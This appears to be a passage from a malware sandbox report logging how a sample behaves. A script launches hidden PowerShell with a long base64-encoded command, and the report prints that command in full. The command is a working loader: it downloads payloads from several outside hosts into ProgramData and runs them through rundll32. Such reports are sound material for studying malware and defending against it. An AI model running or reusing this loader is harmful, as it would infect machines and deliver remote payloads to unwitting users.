AEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA"

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 18, 2023, 9:25 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise filepath: wscript	1	1
CreateProcessInternalW May 18, 2023, 9:25 a.m.	thread_identifier: 2320 thread_handle: 0x00000320 process_identifier: 2312 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000328	1	1
ShellExecuteExW May 18, 2023, 9:25 a.m.	show_type: 0 filepath_r: powershell parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkA